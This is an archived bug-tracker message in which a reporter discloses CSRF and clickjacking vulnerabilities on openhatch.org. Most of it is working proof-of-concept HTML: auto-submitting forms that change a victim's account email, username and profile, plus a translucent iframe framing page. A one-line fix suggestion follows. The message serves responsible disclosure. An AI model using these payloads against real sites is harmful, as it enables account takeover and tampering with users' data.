[OH-Dev] [issue917] CSRF and clickjacking vulnerability at openhatch.org
pik4chu
bugs at openhatch.org
Sat Jan 11 16:36:45 UTC 2014
New submission from pik4chu <jeroldcamacho.res at gmail.com>:
Hey Guys,
I found vulnerabilty at your site,
Cross-site Request Forgery (CSRF) and Clickjacking vulnerability
Description:
Cross-site request forgery, also known as a one-click attack or session riding
and abbreviated as CSRF or XSRF, is a type of malicious exploit of a website
whereby unauthorized commands are transmitted from a user that the website trusts.
Impact:
The impact of this can be anything from creating new data--which may be an
outright defacement, contain disinformation or direct users to another malicious
website--to deleting or altering existing data.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="javascript:document.forms[0].submit()">
<body>
<form action="http://openhatch.org/account/settings/contact-info/do"
method="POST">
<input type="hidden" name="edit_email-email"
value="jeroldcamacho.res@gmail.com" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="javascript:document.forms[0].submit()">
<body>
<form action="http://openhatch.org/account/settings/edit_name_do" method="POST">
<input type="hidden" name="first_name" value="CSRF" />
<input type="hidden" name="last_name" value="CSRF" />
<input type="hidden" name="username" value="CSRF" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
<html>
<body onload="javascript:document.forms[0].submit()">
<body>
<form action="http://openhatch.org/people/info/edit/do" method="POST">
<input type="hidden" name="edit-tags-bio"
value="Cross-site Request Forgery" />
<input type="hidden" name="edit-tags-homepage_url" value="" />
<input type="hidden" name="edit-tags-irc_nick" value="" />
<input type="hidden" name="edit-tags-understands" value="" />
<input type="hidden" name="edit-tags-understands_not" value="" />
<input type="hidden" name="edit-tags-studying" value="" />
<input type="hidden" name="edit-tags-can_pitch_in" value="" />
<input type="hidden" name="edit-tags-can_mentor" value="" />
<input type="hidden" name="edit-tags-contact_blurb" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
to fix the csrf.. you must add auth token in every html forms at your site :)
I FOUND CLICKJACKING VULNERABILITY TOO
~~~~~~~~~~~~~~~~~~~~~
<html><style> iframe {
width: 800px;
height: 500px;
position: absolute;
top: 0; left: 0;
filter: alpha(opacity=50);
opacity: 0.5;
}
</style>
<iframe src="http://openhatch.org/"></html>
----------
messages: 4039
milestone: later
nosy: paulproteus, pik4chu
priority: critical
status: testing
title: CSRF and clickjacking vulnerability at openhatch.org
__________________________________________
Roundup issue tracker <bugs at openhatch.org>
<https://openhatch.org/bugs/issue917>
__________________________________________
More information about the Devel
mailing list